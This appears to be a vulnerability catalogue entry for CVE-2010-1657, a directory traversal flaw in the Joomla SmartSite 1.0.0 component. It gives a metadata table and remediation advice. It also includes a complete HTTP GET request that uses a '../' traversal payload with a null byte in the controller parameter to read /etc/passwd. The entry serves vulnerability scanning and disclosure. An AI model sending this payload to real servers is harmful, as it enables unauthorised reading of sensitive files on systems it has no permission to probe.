| Title | Joomla! Component SmartSite 1.0.0 - Local File Inclusion |
|---|---|
| Author | daffainfo |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. |
| Remediation | Update to the latest version of Joomla! Component SmartSite or apply the necessary patches to fix the LFI vulnerability. |
| CVSS Score | 5 |
| EPSS Score | 0.01501 |
| CVE ID | CVE-2010-1657 |
| CWE ID | CWE-22 |
| Tags | cve cve2010 joomla lfi edb recly vuln |
A directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
GET /index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2010/CVE-2010-1657.yaml
🦈 Packet Capture: ⬇️ Download cve-2010-1657.pcap
N/AN/A